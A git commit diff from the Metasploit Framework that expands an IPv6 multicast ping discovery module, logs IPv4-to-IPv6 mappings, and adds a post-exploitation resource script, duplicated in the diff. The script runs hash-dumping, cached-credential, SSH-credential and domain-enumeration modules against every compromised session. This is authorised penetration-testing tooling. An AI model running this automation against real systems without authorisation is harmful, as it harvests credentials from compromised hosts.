Merge branch 'ipv6_logging' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-ipv6_logging
This commit is contained in:
commit
52e7743b41
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: ipv6_multicast_ping.rb 13962 2011-10-17 02:42:01Z todb $
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'IPv6 Link Local/Node Local Ping Discovery',
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 13962 $',
|
||||
'Description' => %q{
|
||||
Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.
|
||||
},
|
||||
|
@ -65,15 +65,24 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Send ping
|
||||
print_status("Sending multicast pings...")
|
||||
dmac = "33:33:00:00:00:01"
|
||||
|
||||
|
||||
# Figure out our source address by the link-local interface
|
||||
shost = ipv6_link_address
|
||||
|
||||
ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
|
||||
|
||||
|
||||
# m-1-k-3: added some more multicast addresses from wikipedia: https://en.wikipedia.org/wiki/Multicast_address#IPv6
|
||||
ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all nodes
|
||||
ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all routers
|
||||
ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All nodes on the local network segment
|
||||
ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All routers on the local network segment
|
||||
ping6("FF02::5", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllSPF routers
|
||||
ping6("FF02::6", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllDR routers
|
||||
ping6("FF02::9", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #RIP routers
|
||||
ping6("FF02::a", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #EIGRP routers
|
||||
ping6("FF02::d", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #PIM routers
|
||||
ping6("FF02::16", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #MLDv2 reports (defined in RFC 3810)
|
||||
ping6("ff02::1:2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers and relay agents on the local network site (defined in RFC 3315)
|
||||
ping6("ff05::1:3", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers on the local network site (defined in RFC 3315)
|
||||
|
||||
# Listen for host advertisments
|
||||
print_status("Listening for responses...")
|
||||
listen_for_ping_response()
|
||||
|
|
|
@ -132,6 +132,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
next if not addr
|
||||
|
||||
print_status(sprintf(" %16s maps to %s",addr[:ipv4], addr[:ipv6]))
|
||||
report_note(
|
||||
:host => addr[:ipv4],
|
||||
:proto => 'IP',
|
||||
:sname => 'all',
|
||||
:type => 'IPv4 to IPv6 mapping',
|
||||
:data => "system with IPv4 address #{addr[:ipv4]} matches to IPv6 address #{addr[:ipv6]}"
|
||||
) # with this we have the results in our database
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -0,0 +1,119 @@
|
|||
# multi_post.rc
|
||||
# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)
|
||||
|
||||
# This Metasploit RC-File could be used to automate the post-exploitation process
|
||||
# VERBOSE is used from the global datastore
|
||||
# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi
|
||||
# you could add your own post exploitation modules into them
|
||||
|
||||
<ruby>
|
||||
if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it
|
||||
verbose = 1 #true
|
||||
else
|
||||
verbose = 0
|
||||
end
|
||||
|
||||
meterpreter_commands = [
|
||||
'sysinfo',
|
||||
'getuid',
|
||||
'getpid',
|
||||
'ps',
|
||||
'ipconfig'
|
||||
]
|
||||
|
||||
modules_win = [
|
||||
'post/windows/gather/hashdump',
|
||||
'post/windows/gather/cachedump',
|
||||
'post/windows/gather/smart_hashdump',
|
||||
'post/windows/gather/enum_tokens',
|
||||
'post/windows/gather/enum_domain',
|
||||
'post/windows/gather/enum_domain_group_users',
|
||||
'post/windows/gather/enum_domain_tokens',
|
||||
'post/windows/gather/enum_hostfile',
|
||||
'post/windows/gather/enum_ie',
|
||||
'post/windows/gather/enum_logged_on_users',
|
||||
'post/windows/gather/enum_ms_product_keys',
|
||||
'post/windows/gather/credentials/vnc',
|
||||
'post/windows/gather/credentials/windows_autologin',
|
||||
'post/windows/gather/checkvm',
|
||||
'post/windows/gather/enum_applications',
|
||||
'post/windows/gather/enum_services',
|
||||
'post/windows/gather/enum_shares',
|
||||
'post/windows/gather/enum_snmp',
|
||||
'post/windows/gather/enum_devices',
|
||||
'post/windows/gather/enum_powershell_env'
|
||||
] # add some more modules or comment some out ...
|
||||
modules_lin = [
|
||||
'post/linux/gather/hashdump',
|
||||
'post/osx/gather/hashdump',
|
||||
'post/linux/gather/checkvm',
|
||||
'post/linux/gather/enum_cron',
|
||||
'post/linux/gather/enum_linux',
|
||||
'post/linux/gather/enum_packages',
|
||||
'post/linux/gather/enum_services',
|
||||
'post/osx/gather/enum_osx'
|
||||
]
|
||||
modules_multi = [
|
||||
'post/multi/gather/env',
|
||||
'post/multi/gather/ssh_creds'
|
||||
]
|
||||
|
||||
if (framework.sessions.length > 0) # lets start if we have a session
|
||||
print_status("starting with post exploitation stuff")
|
||||
framework.sessions.each_key do |sid|
|
||||
session = framework.sessions[sid]
|
||||
#meterpreter commands against every meterpreter session
|
||||
if(session.type == "meterpreter")
|
||||
print_line("starting meterpreter commands on session number #{sid}")
|
||||
meterpreter_commands.each { |command|
|
||||
print_line("running meterpreter command #{command}")
|
||||
session.console.run_single("#{command.to_s}")
|
||||
print_line
|
||||
}
|
||||
end
|
||||
end
|
||||
|
||||
print_status("starting the post exploitation with post exploitation modules")
|
||||
|
||||
# lets start with post exploitation modules
|
||||
framework.sessions.each_key do |sid|
|
||||
session = framework.sessions[sid]
|
||||
ips = session.tunnel_peer.split(":")
|
||||
print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}")
|
||||
|
||||
modules_multi.each { |modul| # multi -> all sessions
|
||||
run_single("use #{modul}")
|
||||
run_single("set SESSION #{sid}")
|
||||
if (verbose == 1)
|
||||
run_single("run -j")
|
||||
else
|
||||
run_single("run -j -q")
|
||||
end
|
||||
}
|
||||
if(session.platform =~ /win/) # windows sessions
|
||||
modules_win.each { |modul|
|
||||
run_single("use #{modul}")
|
||||
run_single("set SESSION #{sid}")
|
||||
if (verbose == 1)
|
||||
run_single("run -j")
|
||||
else
|
||||
run_single("run -j -q")
|
||||
end
|
||||
}
|
||||
else # all other sessions -> typical some linux or unix based systems
|
||||
modules_lin.each { |modul|
|
||||
run_single("use #{modul}")
|
||||
run_single("set SESSION #{sid}")
|
||||
if (verbose == 1)
|
||||
run_single("run -j")
|
||||
else
|
||||
run_single("run -j -q")
|
||||
end
|
||||
}
|
||||
end
|
||||
end
|
||||
else
|
||||
print_error("no sessions available")
|
||||
end
|
||||
run_single("back")
|
||||
</ruby>
|
|
@ -0,0 +1,119 @@
|
|||
# multi_post.rc
|
||||
# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)
|
||||
|
||||
# This Metasploit RC-File could be used to automate the post-exploitation process
|
||||
# VERBOSE is used from the global datastore
|
||||
# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi
|
||||
# you could add your own post exploitation modules into them
|
||||
|
||||
<ruby>
|
||||
if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it
|
||||
verbose = 1 #true
|
||||
else
|
||||
verbose = 0
|
||||
end
|
||||
|
||||
meterpreter_commands = [
|
||||
'sysinfo',
|
||||
'getuid',
|
||||
'getpid',
|
||||
'ps',
|
||||
'ipconfig'
|
||||
]
|
||||
|
||||
modules_win = [
|
||||
'post/windows/gather/hashdump',
|
||||
'post/windows/gather/cachedump',
|
||||
'post/windows/gather/smart_hashdump',
|
||||
'post/windows/gather/enum_tokens',
|
||||
'post/windows/gather/enum_domain',
|
||||
'post/windows/gather/enum_domain_group_users',
|
||||
'post/windows/gather/enum_domain_tokens',
|
||||
'post/windows/gather/enum_hostfile',
|
||||
'post/windows/gather/enum_ie',
|
||||
'post/windows/gather/enum_logged_on_users',
|
||||
'post/windows/gather/enum_ms_product_keys',
|
||||
'post/windows/gather/credentials/vnc',
|
||||
'post/windows/gather/credentials/windows_autologin',
|
||||
'post/windows/gather/checkvm',
|
||||
'post/windows/gather/enum_applications',
|
||||
'post/windows/gather/enum_services',
|
||||
'post/windows/gather/enum_shares',
|
||||
'post/windows/gather/enum_snmp',
|
||||
'post/windows/gather/enum_devices',
|
||||
'post/windows/gather/enum_powershell_env'
|
||||
] # add some more modules or comment some out ...
|
||||
modules_lin = [
|
||||
'post/linux/gather/hashdump',
|
||||
'post/osx/gather/hashdump',
|
||||
'post/linux/gather/checkvm',
|
||||
'post/linux/gather/enum_cron',
|
||||
'post/linux/gather/enum_linux',
|
||||
'post/linux/gather/enum_packages',
|
||||
'post/linux/gather/enum_services',
|
||||
'post/osx/gather/enum_osx'
|
||||
]
|
||||
modules_multi = [
|
||||
'post/multi/gather/env',
|
||||
'post/multi/gather/ssh_creds'
|
||||
]
|
||||
|
||||
if (framework.sessions.length > 0) # lets start if we have a session
|
||||
print_status("starting with post exploitation stuff")
|
||||
framework.sessions.each_key do |sid|
|
||||
session = framework.sessions[sid]
|
||||
#meterpreter commands against every meterpreter session
|
||||
if(session.type == "meterpreter")
|
||||
print_line("starting meterpreter commands on session number #{sid}")
|
||||
meterpreter_commands.each { |command|
|
||||
print_line("running meterpreter command #{command}")
|
||||
session.console.run_single("#{command.to_s}")
|
||||
print_line
|
||||
}
|
||||
end
|
||||
end
|
||||
|
||||
print_status("starting the post exploitation with post exploitation modules")
|
||||
|
||||
# lets start with post exploitation modules
|
||||
framework.sessions.each_key do |sid|
|
||||
session = framework.sessions[sid]
|
||||
ips = session.tunnel_peer.split(":")
|
||||
print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}")
|
||||
|
||||
modules_multi.each { |modul| # multi -> all sessions
|
||||
run_single("use #{modul}")
|
||||
run_single("set SESSION #{sid}")
|
||||
if (verbose == 1)
|
||||
run_single("run -j")
|
||||
else
|
||||
run_single("run -j -q")
|
||||
end
|
||||
}
|
||||
if(session.platform =~ /win/) # windows sessions
|
||||
modules_win.each { |modul|
|
||||
run_single("use #{modul}")
|
||||
run_single("set SESSION #{sid}")
|
||||
if (verbose == 1)
|
||||
run_single("run -j")
|
||||
else
|
||||
run_single("run -j -q")
|
||||
end
|
||||
}
|
||||
else # all other sessions -> typical some linux or unix based systems
|
||||
modules_lin.each { |modul|
|
||||
run_single("use #{modul}")
|
||||
run_single("set SESSION #{sid}")
|
||||
if (verbose == 1)
|
||||
run_single("run -j")
|
||||
else
|
||||
run_single("run -j -q")
|
||||
end
|
||||
}
|
||||
end
|
||||
end
|
||||
else
|
||||
print_error("no sessions available")
|
||||
end
|
||||
run_single("back")
|
||||
</ruby>
|
Loading…
Reference in New Issue